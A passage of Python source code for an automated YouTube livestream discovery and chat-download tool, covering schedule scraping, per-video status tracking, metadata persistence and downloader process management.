if video.video_id not in self.videos:
self.videos.add(video.video_id)
self.modify_timestamp = get_timestamp_now()
self.did_discovery_print = False
if self.batching:
self.batch.add(video.video_id)
def add_video_ids(self, video_ids: list):
""" Add videos to our list, and possibly our current batch
Modifies timestamp on success
"""
new_videos = set(video_id) - self.videos
if len(new_videos) > 0:
self.modify_timestamp = get_timestamp_now()
self.did_discovery_print = False
if self.batching:
self.batch |= new_videos
def start_batch(self):
""" Declare that the next videos are a new batch """
if self.batching:
raise TransitionException("channel batch already started")
self.batching = True
self.batch = set()
def end_batch(self):
""" Finish declaring that the next videos are a new batch """
if not self.batching:
raise TransitionException("channel batch not started")
self.batching = False
def clear_batch(self):
""" Forget a batch (does not affect list of videos) """
self.batching = False
self.batch = set()
# video statuses:
# unknown: not yet scraped
# prelive: scheduled live
# live: in-progress live
# postlive: completed/missed live
# upload: not a livestream
# progress statuses:
# add -> unscraped
# unscraped -> waiting if scheduled
# unscraped -> downloading if downloader invoked (I don't think this is used)
# unscraped -> missed if was live
# unscraped -> invalid if not a live (was uploaded)
# waiting -> downloading when the chat is available, downloader invoked
# waiting -> missed if downloader was unable to invoke and finished airing
# downloading -> downloaded if downloader completes.
# unscraped: needs scrape
# waiting: future-scheduled live, not yet downloading or downloaded
# downloading: chat downloader invoked successfully
# downloaded: chat downloader completed after successful invocation
# missed: already aired live, we skip
# invalid: isn't a livestream
# aborted: could not process video (scrape failed?)
# YTMeta:
# raw: json output of the yt-dl program
# id:
# title:
# description:
# duration:
# uploader: (name)
# channel_id:
# is_livestream:
# is_live:
# live_starttime:
# live_endtime:
# is_upcoming:
def update_lives():
subprocess.run(holoscrapecmd, shell=True)
html_doc = ''
with open("auto-lives_tz", "rb") as fp:
html_doc = fp.read()
soup = BeautifulSoup(html_doc, 'html.parser')
with open("auto-lives_tz", "wb") as fp:
fp.write(soup.prettify().encode())
return soup
def update_lives_status():
with open("discovery.txt", "a") as dlog:
try:
update_lives_status_holoschedule(dlog)
except Exception:
print("warning: exception during holoschedule scrape. Network error?")
traceback.print_exc()
try:
update_lives_status_urllist(dlog)
except Exception:
print("warning: exception during urllist scrape. Network error?")
traceback.print_exc()
try:
update_lives_status_channellist(dlog)
except Exception:
print("warning: exception during channellist scrape. Network error?")
traceback.print_exc()
def update_lives_status_holoschedule(dlog):
# Find all sections indicated by a 'day' header
soup = update_lives()
allcont = soup.find(id='all')
allcontchildren = [node for node in allcont.children if len(repr(node)) > 4]
localdate = ''
newlives = 0
knownlives = 0
error = False
try:
for child in allcontchildren:
day = child.find(class_='navbar-text')
if day:
localdate = [x for x in day.stripped_strings][0].split()[0]
# Extract MM/DD date from header
for link in child.find_all('a'):
# Process Youtube link; get HH:MM starttime and user-friendly channel name (not localized) if possible
items = None
localtime = ''
channelowner = ''
video_id = None
malformed = False
# Extract link
href = link.get('href')
video_id = extract_video_id_from_yturl(href)
if video_id is None:
error = True
continue
# Check for existing state
if video_id not in lives:
recall_video(video_id, filter_progress=True)
video = lives[video_id]
if video_id not in lives:
video = Video(video_id)
lives[video_id] = video
try:
items = [x for x in link.stripped_strings]
localtime = items[0]
channelowner = items[1]
except Exception:
malformed = True
if not malformed:
print("discovery: new live listed: " + video_id + " " + localdate + " " + localtime + " : " + channelowner, file=dlog, flush=True)
else:
print("discovery: new live listed (malformed page): " + video_id, file=dlog, flush=True)
newlives += 1
else:
# known (not new) live listed
knownlives += 1
except Exception:
error = True
traceback.print_exc()
if newlives + knownlives == 0 or error:
print("warning: unexpected error when processing holoschedule page (found " + str(newlives + knownlives) + " total lives), using fallback", file=sys.stderr)
saved_newlives = newlives
newlives = 0
knownlives = 0
error = False
for link in soup.find_all('a'):
# Extract any link
href = link.get('href')
video_id = None
video_id = extract_video_id_from_yturl(href)
if video_id is None:
error = True
continue
if not malformed:
if video_id not in lives:
recall_video(video_id, filter_progress=True)
video = lives[video_id]
if video_id not in lives:
video = Video(video_id)
lives[video_id] = video
print("discovery: new live listed (fallback extraction): " + video_id, file=dlog, flush=True)
newlives += 1
else:
# known (not new) live listed
knownlives += 1
print("discovery: holoschedule: (fallback) new lives: " + str(newlives))
print("discovery: holoschedule: (fallback) new lives (initial try): " + str(saved_newlives))
print("discovery: holoschedule: (fallback) known lives: " + str(knownlives))
if error:
print("note: video id extraction errors occured when processing holoschedule page using fallback method (found " + str(newlives + knownlives) + " total lives)", file=sys.stderr)
else:
print("discovery: holoschedule: new lives: " + str(newlives))
print("discovery: holoschedule: known lives: " + str(knownlives))
def update_lives_status_urllist(dlog):
# TODO
pass
def update_lives_status_channellist(dlog):
""" Read channels.txt for a list of channel IDs to process. """
try:
if os.path.exists(channelsfile):
with open(channelsfile) as channellist:
for channel_id in [x.strip().split()[0] for x in channellist.readlines()]:
channel = None
use_ytdlp = False
if channel_id in channels:
channel = channels[channel_id]
else:
channel = Channel(channel_id)
channels[channel_id] = channel
# use chat_downloader to get initial video list
print("New channel: " + channel.channel_id)
if not use_ytdlp:
try:
scrape_and_process_channel_chatdownloader(channel, dlog)
except Exception:
print("failed to scrape channel list with chat_downloader:", channel_id, file=sys.stderr)
traceback.print_exc()
use_ytdlp = True
if use_ytdlp:
invoke_channel_scraper(channel)
process_channel_videos(channel, dlog)
# Scrape community tab page for links (esp. member stream links)
# Currently only try this when cookies are provided.
if os.path.exists(channel_id + ".txt"):
invoke_channel_scraper(channel, community_scrape=True)
process_channel_videos(channel, dlog)
except Exception:
print("warning: unexpected error with processing channels.txt", file=sys.stderr)
traceback.print_exc()
def rescrape_chatdownloader(video: Video, channel=None, youtube=None):
""" rescrape_ytdlp, but using chat_downloader """
video_id = video.video_id
video_data, player_response, status = invoke_scraper_chatdownloader(video_id, youtube)
microformat = player_response['microformat']['playerMicroformatRenderer']
video_details = player_response['videoDetails']
# keep only known useful fields, junk spam/useless fields
old_player_response = player_response
player_response = {}
for key in ['playabilityStatus', 'videoDetails', 'microformat']:
player_response[key] = old_player_response[key]
for key in ['streamingData']:
player_response[key] = old_player_response.get(key)
del old_player_response
# "export" the fields manually here
meta = {}
meta['_scrape_provider'] = 'chat_downloader'
meta['id'] = video_id
meta['referrer_channel_id'] = channel and channel.channel_id
meta['channel_id'] = video_details['channelId']
meta['title'] = microformat['title']['simpleText']
meta['raw'] = player_response # I think this is different from yt-dlp infodict output
meta['description'] = microformat['description']['simpleText']
meta['uploader'] = video_data['author']
meta['duration'] = video_data['duration']
meta['is_live'] = video_details.get('isLive') is True
meta['is_upcoming'] = video_details.get('isUpcoming') is True
meta['is_livestream'] = video_details.get('isLiveContent') is True
try:
meta['live_starttime'] = int(dt.datetime.fromisoformat(microformat['liveBroadcastDetails']['startTimestamp']).timestamp() + 0.1)
except Exception:
meta['live_starttime'] = None
try:
meta['live_endtime'] = int(dt.datetime.fromisoformat(microformat['liveBroadcastDetails']['endTimestamp']).timestamp() + 0.1)
except Exception:
meta['live_endtime'] = None
if meta['is_live']:
meta['live_status'] = 'is_live'
elif meta['is_upcoming']:
meta['live_status'] = 'is_upcoming'
elif meta['is_livestream']:
meta['live_status'] = 'was_live'
else:
meta['live_status'] = 'not_live'
video.set_status(status)
video.reset_progress()
video.meta = meta
rawmeta = meta.get('raw')
if not rawmeta:
# Note: rawmeta may be older than meta, but it's better than being lost.
video.set_progress('aborted')
else:
video.rawmeta = rawmeta
video.set_progress('waiting')
video.meta_timestamp = get_timestamp_now()
try:
del meta['raw']
except KeyError:
pass
def invoke_scraper_chatdownloader(video_id, youtube=None, skip_status=False):
""" Like invoke_scraper_ytdlp, but use chat_downloader's python interface instead of forking and calling yt-dlp.
Try to export the status for the autoscraper as well.
Returns raw YouTube data and the deduced status.
"""
if youtube is None:
downloader = ChatDownloader()
youtube = downloader.create_session(YouTubeChatDownloader)
video_data, player_response, *_ = youtube._parse_video_data(video_id)
scraper_status = None
if not skip_status:
details = youtube.get_video_data(video_id)
status = details.get('status')
video_type = details.get('video_type')
if video_type not in {'premiere', 'video'} or (video_type == 'premiere' and details.get('continuation_info') == {}):
scraper_status = 'upload'
elif status == 'upcoming':
scraper_status = 'prelive'
elif status == 'live':
scraper_status = 'live'
elif status == 'past':
scraper_status = 'postlive'
else:
scraper_status = 'unknown'
return video_data, player_response, scraper_status
def scrape_and_process_channel_chatdownloader(channel: Channel, dlog):
""" Use chat_downloader's get_user_videos() to quickly get channel videos and live statuses. """
downloader = ChatDownloader()
# Forcefully create a YouTube session
youtube = downloader.create_session(YouTubeChatDownloader)
limit = CHANNEL_SCRAPE_LIMIT
count = 0
perpage_count = 0
valid_count = 0
skipped = 0
seen_vids = set()
# We don't just check 'all' since the list used may be slow to update.
for video_status in ['upcoming', 'live', 'all']:
perpage_count = 0
time.sleep(0.1)
for basic_video_details in youtube.get_user_videos(channel_id=channel.channel_id, video_status=video_status):
status = 'unknown'
status_hint = None
video_id = basic_video_details.get('video_id')
try:
status_hint = basic_video_details['view_count'].split()[1]
if status_hint == "waiting":
status = 'prelive'
elif status_hint == "watching":
status = 'live'
elif status_hint == "views":
pass
else:
print(f"warning: could not understand status hint ({status_hint = })", file=sys.stderr)
raise RuntimeError('could not extract status hint')
except KeyError:
if video_id is not None and lives[video_id].progress not in {'unscraped', 'aborted'} and lives[video_id].status not in {'postlive', 'upload'}:
print(f"warning: status hint extraction: unexpected KeyError... {count = } {perpage_count = } (+1) ... {valid_count = } {skipped = } {limit = } ... {seen_vids = } ... {basic_video_details = })", file=sys.stderr)
traceback.print_exc()
else:
# 'waiting' may be hidden on the player response page (possibly a server bug, but could also be intentional)
print(f"warning: status hint extraction: unexpected KeyError, already scraped, not live... {basic_video_details = })", file=sys.stderr)
except Exception:
print("warning: could not extract status hint", file=sys.stderr)
raise
perpage_count += 1
if perpage_count >= limit:
if video_id in seen_vids or status == 'unknown' or (video_id in lives and lives[video_id].progress != 'unscraped'):
# would continue
print(f"perpage limit of {limit} reached:", video_status)
if video_id not in seen_vids:
count += 1
if status != 'unknown' and not (video_id in lives and lives[video_id].progress != 'unscraped'):
skipped += 1
break
if video_id in seen_vids:
continue
else:
count += 1
if status == 'unknown':
# ignore past streams/uploads
continue
valid_count += 1
if video_id in lives and lives[video_id].progress != 'unscraped':
skipped += 1
continue
if status != 'unknown':
print(f"discovery: new live listed (chat_downloader channel extraction, status: {status}): " + video_id, file=sys.stdout, flush=True)
print(f"discovery: new live listed (chat_downloader channel extraction, status: {status}): " + video_id, file=dlog, flush=True)
if video_id not in lives:
lives[video_id] = Video(video_id)
video = lives[video_id]
channel.add_video(video)
rescrape_chatdownloader(video, channel=channel, youtube=youtube)
persist_meta(video, fresh=True)
if perpage_count >= limit:
print(f"perpage limit of {limit} reached:", video_status)
break
if count >= limit * 3:
print(f"limit of {limit} reached")
break
print(f"discovery: channels list (via chat_downloader): channel {channel.channel_id} new upcoming/live lives: " + str(valid_count) + "/" + str(count) + " (" + str(skipped) + " known)")
def invoke_channel_scraper(channel: Channel, community_scrape=False):
""" Scrape the channel for latest videos and batch-fetch meta state. """
# Note: some arbitrary limits are set in the helper program that may need tweaking.
if not community_scrape:
print("Scraping channel " + channel.channel_id)
subprocess.run(channelscrapecmd + " " + channel.channel_id, shell=True)
else:
print("Scraping channel community pages " + channel.channel_id)
subprocess.run(channelpostscrapecmd + " " + channel.channel_id, shell=True)
with open("channel-cached/" + channel.channel_id + ".meta.new") as allmeta:
metalist = []
for jsonres in allmeta.readlines():
try:
metalist.append(export_scraped_fields_ytdlp(json.loads(jsonres)))
except Exception:
if community_scrape:
print("warning: exception in channel post scrape task (corrupt meta?)", file=sys.stderr)
else:
print("warning: exception in channel scrape task (corrupt meta?)", file=sys.stderr)
traceback.print_exc()
for ytmeta in metalist:
video_id = ytmeta["id"]
recall_video(video_id, filter_progress=True)
video = lives.get(video_id)
if video and video.meta is None:
video.meta = ytmeta
video.rawmeta = ytmeta.get('raw')
video.did_meta_flush = False
else:
if community_scrape:
print("ignoring ytmeta from channel post scrape")
else:
print("ignoring ytmeta from channel scrape")
# TODO: rewrite
def process_channel_videos(channel: Channel, dlog):
""" Read scraped channel video list, proccess each video ID, and persist the meta state. """
newlives = 0
knownlives = 0
numignores = {}
channel_id = channel.channel_id
channel.did_discovery_print = True
channel.start_batch()
try:
with open("channel-cached/" + channel_id + ".url.all") as urls:
for video_id in [f.split(" ")[1].strip() for f in urls.readlines()]:
# Process each recent video
if video_id not in lives:
recall_video(video_id, filter_progress=True)
video = lives[video_id]
channel.add_video(video)
if not channel.did_discovery_print:
print("discovery: new live listed: " + video_id + " on channel " + channel_id, file=dlog, flush=True)
# TODO: accumulate multiple videos at once.
channel.did_discovery_print = True
newlives += 1
else:
# known (not new) live listed (channel unaware)
knownlives += 1
saved_progress = video.progress
if not FORCE_RESCRAPE and saved_progress in {'downloaded', 'missed', 'invalid', 'aborted'}:
numignores[saved_progress] = numignores.setdefault(saved_progress, 0) + 1
delete_ytmeta_raw(video_id, suffix=" (channel)")
continue
cache_miss = False
# process precached meta
if video.meta is None:
# We may be reloading old URLs after a program restart
print("ytmeta cache miss for video " + video_id + " on channel " + channel_id)
cache_miss = True
rescrape(video)
if video.meta is None:
# scrape failed
continue
video.rawmeta = video.meta.get('raw')
video.did_meta_flush = False
process_ytmeta(video)
# Avoid redundant disk flushes (as long as we presume that the title/description/listing status won't change)
# I look at this and am confused by the '==' here (and one place elsewhere)...
if cache_miss or (saved_progress not in {'missed', 'invalid'} and saved_progress != video.progress):
persist_meta(video, fresh=True)
if not video.did_meta_flush:
# Essentially nerfs the above performance optimization...
print("warning: didn't flush meta for channel video; flushing now", file=sys.stderr)
persist_meta(video, fresh=True)
except IOError:
print("warning: unexpected I/O error when processing channel scrape results", file=sys.stderr)
traceback.print_exc()
channel.end_batch()
if len(channel.batch) > 0:
print("discovery: channels list: new lives on channel " + channel_id + " : " + str(newlives))
print("discovery: channels list: known lives on channel " + channel_id + " : " + str(knownlives))
for progress, count in numignores.items():
print("discovery: channels list: skipped ytmeta fetches on channel " + channel_id + " : " + str(count) + " skipped due to progress state '" + progress + "'")
channel.clear_batch()
def persist_meta(video: Video, fresh=False, clobber=True):
video_id = video.video_id
metafile = 'by-video-id/' + video_id
# Debug switch
if DISABLE_PERSISTENCE:
print('NOT updating ' + metafile)
return
if clobber or not os.path.exists(metafile):
print('Updating ' + metafile)
pidfile = 'pid/' + video_id
meta = {}
meta['status'] = video.status
# TODO: only process_dlpid_queue uses fresh=False, so the "saved" progress is mostly useless.
# Best just special-case that setter function, if even needed.
meta['progress'] = video.progress
# Write ytmeta to a separate file (to avoid slurping large amounts of data)
if video.meta is not None:
ytmeta = {}
ytmeta['ytmeta'] = video.meta
ytmeta['ytmeta']['raw'] = video.rawmeta
if video.rawmeta is None:
ytmeta['ytmeta']['raw'] = video.meta.get('raw')
metafileyt = metafile + ".meta"
metafileyt_status = metafileyt + "." + video.status
if video.rawmeta is None:
metafileyt_status += ".simple"
try:
if clobber or not os.path.exists(metafileyt):
print('Updating ' + metafileyt)
with open(metafileyt, 'wb') as fp:
fp.write(json.dumps(ytmeta, indent=1).encode())
if clobber or not os.path.exists(metafileyt_status):
print('Updating ' + metafileyt_status)
with open(metafileyt_status, 'wb') as fp:
fp.write(json.dumps(ytmeta, indent=1).encode())
finally:
try:
# Since we don't deep-copy, don't keep 'raw' in the meta dict.
if video.rawmeta is not None:
del video.meta['raw']
except KeyError:
pass
if clobber or not os.path.exists(metafile):
with open(metafile, 'wb') as fp:
fp.write(json.dumps(meta, indent=1).encode())
if clobber or not os.path.exists(pidfile):
with open(pidfile, 'wb') as fp:
if pids.get(video_id) is not None:
# Write dlpid to file
fp.write(str(pids[video_id][1]).encode())
video.did_meta_flush = True
# TODO: replace recall_meta with recall_video
def recall_video(video_id: str, filter_progress=False):
""" Read status, progress for video_id.
If filter_progress is set to True, avoid ytmeta loads for certain progress states,
unless unconditional rescraping is set.
"""
# Not cached in memory, look for saved state.
metafile = 'by-video-id/' + video_id
metafileyt = metafile + ".meta"
valid_meta = os.path.exists(metafile)
valid_ytmeta = os.path.exists(metafileyt)
meta = None
ytmeta = None
should_ignore = False
if valid_meta:
# Query saved state if it is not loaded
with open(metafile, 'rb') as fp:
try:
meta = json.loads(fp.read())
valid_meta = meta['status'] in statuses and meta['progress'] in progress_statuses
except (json.decoder.JSONDecodeError, KeyError):
valid_meta = False
# Reduce memory usage by not loading ytmeta for undownloadable videos
if filter_progress:
should_ignore = meta['progress'] in {'downloaded', 'missed', 'invalid', 'aborted'}
# note: FORCE_RESCRAPE might clobber old ytmeta if not loaded (bad if the video drastically changes or goes unavailable)
if valid_ytmeta and not should_ignore:
with open(metafileyt, 'rb') as fp:
try:
ytmeta = json.loads(fp.read())
valid_ytmeta = 'ytmeta' in ytmeta
except (json.decoder.JSONDecodeError, KeyError):
valid_ytmeta = False
video = Video(video_id)
lives[video_id] = video
if valid_meta:
# Commit status to runtime tracking (else we would discard it here)
# Direct assignment here to avoid checks, might rewrite later
video.status = meta['status']
video.progress = meta['progress']
if valid_ytmeta and not should_ignore:
video.meta = ytmeta['ytmeta']
video.rawmeta = ytmeta['ytmeta'].get('raw')
if video.rawmeta is not None:
del video.meta['raw']
# unmigrated (monolithic file) format
elif 'ytmeta' in meta:
video.meta = meta['ytmeta']
video.rawmeta = meta['ytmeta'].get('raw')
if video.rawmeta is not None:
del video.meta['raw']
if DISABLE_PERSISTENCE:
return
print('notice: migrating ytmeta in status file to new file right now: ' + metafile)
persist_meta(video, fresh=True)
if should_ignore:
delete_ytmeta_raw(video, suffix=" (meta recall)")
def process_ytmeta(video: Video):
if video.meta is None:
raise RuntimeError('precondition failed: called process_ytmeta but ytmeta for video ' + video.video_id + ' not found.')
if video.meta['is_upcoming']:
# note: premieres can also be upcoming but are not livestreams.
video.set_status('prelive')
if video.progress == 'unscraped':
video.set_progress('waiting')
elif video.meta['is_live']:
video.set_status('live')
if video.progress == 'unscraped':
video.set_progress('waiting')
elif video.meta['is_livestream'] or video.meta['live_endtime']:
# note: premieres also have a starttime and endtime
video.set_status('postlive')
if video.progress == 'unscraped':
video.set_progress('missed')
else:
video.set_status('upload')
video.set_progress('invalid')
def maybe_rescrape(video: Video):
saved_progress = video.progress
if video.progress == 'unscraped':
video.rescrape_meta()
if video.meta is None:
# scrape failed
return
process_ytmeta(video)
# Avoid redundant disk flushes (as long as we presume that the title/description/listing status won't change)
if saved_progress not in {'missed', 'invalid'} and saved_progress != video.progress:
persist_meta(video, fresh=True)
def maybe_rescrape_initially(video: Video):
if video.progress == 'downloading':
video.reset_progress()
if video.progress == 'unscraped' or FORCE_RESCRAPE:
video.rescrape_meta()
if video.meta is None:
# scrape failed
return
process_ytmeta(video)
# Redundant, but purges corruption
persist_meta(video, fresh=True)
def export_scraped_fields_ytdlp(jsonres):
ytmeta = {}
ytmeta['_scrape_provider'] = 'yt-dlp'
ytmeta['raw'] = jsonres
ytmeta['id'] = jsonres['id']
ytmeta['title'] = jsonres['title']
ytmeta['description'] = jsonres['description']
ytmeta['uploader'] = jsonres['uploader']
ytmeta['channel_id'] = jsonres['channel_id']
ytmeta['duration'] = jsonres['duration']
try:
# Fields from my yt-dlp fork's experimental patches
ytmeta['is_live'] = jsonres['is_live']
ytmeta['live_starttime'] = jsonres['live_starttime']
ytmeta['live_endtime'] = jsonres['live_endtime']
ytmeta['is_upcoming'] = jsonres['is_upcoming']
ytmeta['is_livestream'] = jsonres['was_live']
except KeyError:
# yt-dlp introduced their own new metadata fields for livestreams, try those.
# Note that some data, like the endtime, can't be directly obtained. Also,
# ISO-8601 times for starttime/endtime have been converted to epoch timestamps.
try:
# Old field but repurposed to strictly match its name.
ytmeta['is_livestream'] = jsonres['was_live']
# Refetch using possibly missing new fields
ytmeta['is_livestream'] = 'not_live' not in jsonres['live_status']
if 'track' in jsonres:
# Should be a song, so likely (certainly?) a premiere
ytmeta['is_livestream'] = False
# Reliable, except in the case of "late" livestreams (where it seems to be missing).
ytmeta['live_starttime'] = jsonres['release_timestamp']
# The duration provided by Youtube might not be the broadcast duration;
# further testing is required. We don't rely on the duration though
# except for saving finished stream metadata, which isn't done automatically.
if ytmeta['live_starttime'] is not None and bool(ytmeta['duration']):
ytmeta['live_endtime'] = ytmeta['live_starttime'] + ytmeta['duration']
else:
ytmeta['live_endtime'] = None
# Fields is_upcoming and is_live have been merged into a string field.
ytmeta['live_status'] = jsonres['live_status']
if ytmeta['live_status'] == 'is_live':
ytmeta['is_live'] = True
elif ytmeta['live_status'] in {'is_upcoming', 'was_live', 'not_live'}:
ytmeta['is_live'] = False
else:
# live_status is None or set to an unknown value
ytmeta['is_live'] = ytmeta['live_status'] != 'is_upcoming' and jsonres['live_endtime'] is None
if 'is_upcoming' not in ytmeta:
ytmeta['is_upcoming'] = ytmeta['live_status'] == 'is_upcoming'
except (TypeError, KeyError):
print("warning: exporting ytmeta fields not fully successful, expect this download to fail:", ytmeta.get('id'), file=sys.stderr)
ytmeta['is_livestream'] = ytmeta.get('is_livestream')
ytmeta['live_starttime'] = ytmeta.get('live_starttime')
ytmeta['live_endtime'] = ytmeta.get('live_endtime')
ytmeta['live_status'] = ytmeta.get('live_status')
ytmeta['is_live'] = ytmeta.get('is_live')
# last-ditch effort to avoid missing a stream
ytmeta['is_upcoming'] = ytmeta.get('is_upcoming') or not bool(ytmeta['duration'])
return ytmeta
def rescrape_ytdlp(video: Video):
""" Invoke the scraper, yt-dlp, on a video now.
Sets a restructured json result as meta.
"""
jsonres = invoke_scraper_ytdlp(video.video_id)
if jsonres is None:
# Mark as aborted here, before processing
video.set_progress('aborted')
return None
video.meta = export_scraped_fields_ytdlp(jsonres)
def invoke_scraper_ytdlp(video_id):
if video_id not in lives:
raise ValueError('invalid video_id')
proc = None
try:
cmdline = downloadmetacmd + "-- " + video_id
print(cmdline.split())
proc = subprocess.run(cmdline.split(), capture_output=True)
with open('outtmp', 'wb') as fp:
fp.write(proc.stdout)
if len(proc.stdout) == 0:
print(b"scraper error: no stdout! stderr=" + proc.stderr)
return None
return json.loads(proc.stdout)
except Exception:
print("warning: exception thrown during scrape task. printing traceback...", file=sys.stderr)
traceback.print_exc()
if proc:
print("stdout dump for failed scrape, for video " + video_id + ":", file=sys.stderr)
print(proc.stdout, file=sys.stderr)
print("end of stdout dump for failed scrape:", file=sys.stderr)
return None
def safen_path(s):
try:
# The slice is to avoid long fields hitting path limits, albeit ineffectively.
return str(s).replace(':', '_').replace('/', '_').replace(' ', '_')[0:100]
except Exception:
print("warning: string safening failed, returning dummy value...")
return ""
q = mp.SimpleQueue()
def process_dlpid_queue():
""" Process (empty) the queue of PIDs from newly invoked downloaders and update their state. """
while not q.empty():
(pid, dlpid, vid) = q.get()
try:
lives[vid].set_progress('downloading')
except TransitionException:
if lives[vid].progress in {'unscraped', 'waiting', 'downloading'}:
print(f"warning: discarding weird progress status {lives[vid].progress}, setting to downloading:", vid)
lives[vid].reset_progress()
lives[vid].set_progress('waiting')
lives[vid].set_progress('downloading')
pids[vid] = (pid, dlpid)
persist_meta(lives[vid])
def invoke_downloader(video: Video):
try:
video_id = video.video_id
print('invoking for ' + str(video_id))
if pids.get(video_id):
print("warning: duplicate invocation for video " + video_id + " (according to internal PID state)", file=sys.stderr)
nowtime = dt.datetime.utcnow()
outfile = "_" + video_id + "_curr-" + str(nowtime.timestamp())
title = video.meta.get('title')
uploader = video.meta.get('uploader')
channel_id = video.meta.get('channel_id')
starttime = video.meta.get('live_starttime')
live_status = video.status
currtimesafe = safen_path(nowtime.isoformat(timespec='seconds')) + "_UTC"
with open("by-video-id/" + video_id + ".loginfo", "a") as fp:
res = {"video_id": video_id, "title": title, "channel_id": channel_id, "uploader": uploader, "starttime": starttime, "currtime": currtimesafe, "live_status": live_status, "basename": outfile}
fp.write(json.dumps(res, indent=2))
p = mp.Process(target=_invoke_downloader_start, args=(q, video_id, outfile))
p.start()
# Wait for the process to spawn and for the downloader PID to be sent.
time.sleep(0.5)
process_dlpid_queue() # hopefully just what we just spawned
except Exception:
print("warning: downloader invocation failed because of an exception. printing traceback...", file=sys.stderr)
traceback.print_exc()
def check_pid(pid):
""" Check For the existence of a unix pid. """
try:
os.kill(int(pid), 0)
except OSError:
return False
else:
return True
def start_watchdog():
""" Ensure the program exits after a top-level exception. """
subprocess.run('date')
subprocess.Popen([watchdogprog, str(os.getpid())])
def _invoke_downloader_start(q, video_id, outfile):
# There is not much use for the python pid, we store the process ID only for debugging
pid = os.getpid()
print("process fork " + str(pid) + " is live, with outfile " + outfile)
proc = subprocess.Popen([downloadchatprgm, outfile, video_id])
q.put((pid, proc.pid, video_id))
# Close the queue to flush it and avoid blocking the python process on exit.
time.sleep(0.1)
try:
q.close()
except AttributeError:
pass # older python versions (pre-3.9) lack close()
# Block this fork (hopefully not the main process)
try:
proc.wait()
print("process fork " + str(pid) + " has waited")
except KeyboardInterrupt:
print("process fork " + str(pid) + " was interrupted")
raise KeyboardInterrupt from None
def delete_ytmeta_raw(video: Video, suffix=None):
""" Delete ytmeta['raw'] field that eats memory; count deletions """
try:
video.rawmeta = None
keyname = 'ytmeta del successes'
if suffix:
keyname = keyname + suffix
general_stats[keyname] = general_stats.setdefault(keyname, 0) + 1
except (KeyError, AttributeError):
keyname = 'ytmeta del failures'
if suffix:
keyname = keyname + suffix
general_stats[keyname] = general_stats.setdefault(keyname, 0) + 1
def process_one_status(video: Video, first=False):
# Process only on change
if video.did_status_print:
return
video_id = video.video_id
if video.progress == 'waiting':
if video.meta is None:
print("error: video.meta missing for video " + video_id, file=sys.stderr)
# video.prepare_meta()
else:
print("status: just invoked: " + video_id, file=statuslog)
invoke_downloader(video)
elif video.progress == 'missed':
if first:
print("status: missed (possibly cached?): " + video_id, file=statuslog)
else:
print("status: missed: " + video_id, file=statuslog)
delete_ytmeta_raw(video)
elif video.progress == 'invalid':
if first:
print("status: upload (possibly cached/bogus?): " + video_id, file=statuslog)
else:
print("status: upload: " + video_id, file=statuslog)
delete_ytmeta_raw(video)
elif video.progress == 'aborted':
if first:
print("status: aborted (possibly cached/bogus?): " + video_id, file=statuslog)
else:
print("status: aborted: " + video_id, file=statuslog)
delete_ytmeta_raw(video)
elif video.progress == 'downloading':
if first:
print("status: downloading (but this is wrong; we just started!): " + video_id, file=statuslog)
wants_rescrape = False
if pids.get(video_id):
(pypid, dlpid) = pids[video_id]
if not check_pid(dlpid):
print("status: dlpid no longer exists: " + video_id, file=statuslog)
# Check before making this video unredownloadable
wants_rescrape = True
else:
if first:
print("status: downloading (apparently, may be bogus): " + video_id, file=statuslog)
else:
print("status: downloading: " + video_id, file=statuslog)
else:
if first:
print("warning: pid lookup for video " + video_id + " failed (initial load, should be unreachable).", file=sys.stderr)
else:
print("warning: pid lookup for video " + video_id + " failed.", file=sys.stderr)
print("status: unknown: " + video_id, file=statuslog)
wants_rescrape = True
if wants_rescrape:
# Check status
downloader = ChatDownloader()
youtube = downloader.create_session(YouTubeChatDownloader)
details = None
try:
details = youtube.get_video_data(video_id)
except Exception:
pass
if details and details.get('status') in {'live', 'upcoming'}:
print("warning: downloader seems to have exited prematurely. reinvoking:", video_id, file=sys.stderr)
invoke_downloader(video)
else:
video.set_progress('downloaded')
try:
del pids[video_id]
except KeyError:
pass
persist_meta(video, fresh=True)
delete_ytmeta_raw(video)
elif video.progress == 'downloaded':
if first:
print("status: finished (cached?): " + video_id, file=statuslog)
else:
print("status: finished: " + video_id, file=statuslog)
delete_ytmeta_raw(video)
if not video.did_meta_flush:
print("warning: didn't flush meta for video; flushing now", file=sys.stderr)
persist_meta(video, fresh=True)
video.did_progress_print = True
statuslog.flush()
def handle_special_signal(signum, frame):
os.makedirs('dump', exist_ok=True)
with open("dump/lives", "w") as fp:
for video in lives.values():
# Fine as long as no objects in the class.
fp.write(json.dumps(video.__dict__, sort_keys=True))
with open("dump/pids", "w") as fp:
fp.write(json.dumps(pids))
with open("dump/general_stats", "w") as fp:
fp.write(json.dumps(general_stats))
with open("dump/staticconfig", "w") as fp:
print("FORCE_RESCRAPE=" + str(FORCE_RESCRAPE), file=fp)
print("DISABLE_PERSISTENCE=" + str(DISABLE_PERSISTENCE), file=fp)
rescrape = rescrape_ytdlp
invoke_scraper = invoke_scraper_ytdlp
# TODO
if __name__ == '__main__':
mainpid = os.getpid()
write_cgroup(mainpid)
print(f"{mainpid = }")
# Prep storage and persistent state directories
os.makedirs('oo', exist_ok=True)
os.chdir('oo')
os.makedirs('by-video-id', exist_ok=True)
os.makedirs('chat-logs', exist_ok=True)
os.makedirs('pid', exist_ok=True)
signal.signal(signal.SIGUSR1, handle_special_signal)
print("Updating lives status", flush=True)
update_lives_status()
# Initial load
print("Starting initial pass", flush=True)
with open("discovery.txt", "a") as dlog:
print("program started", file=dlog, flush=True)
dlog.flush()
statuslog = open("status.txt", "a")
print("program started", file=statuslog)
statuslog.flush()
os.fsync(statuslog.fileno())
if True:
try:
# Populate cache from disk
for video_id, video in lives.items():
progress = video.progress
if progress == 'unscraped':
# Try to load missing meta from disk
recall_video(video_id)
# Try to make sure downloaders are tracked with correct state
process_dlpid_queue()
# Scrape each video again if needed
for video in lives.values():
maybe_rescrape_initially(video)
for video in lives.values():
process_one_status(video, first=True)
except KeyboardInterrupt:
statuslog.flush()
os.fsync(statuslog.fileno())
raise
except Exception as exc:
start_watchdog()
raise RuntimeError("Exception encountered during initial load processing") from exc
statuslog.flush()
print("Starting main loop", flush=True)
while True:
try:
time.sleep(SCRAPER_SLEEP_INTERVAL)
update_lives_status()
# Try to make sure downloaders are tracked with correct state
process_dlpid_queue()
# Scrape each video again if needed
for video in lives.values():
maybe_rescrape(video)
for video in lives.values():
process_one_status(video)
except KeyError:
print("warning: internal inconsistency! squashing KeyError exception...", file=sys.stderr)
except KeyboardInterrupt:
statuslog.flush()
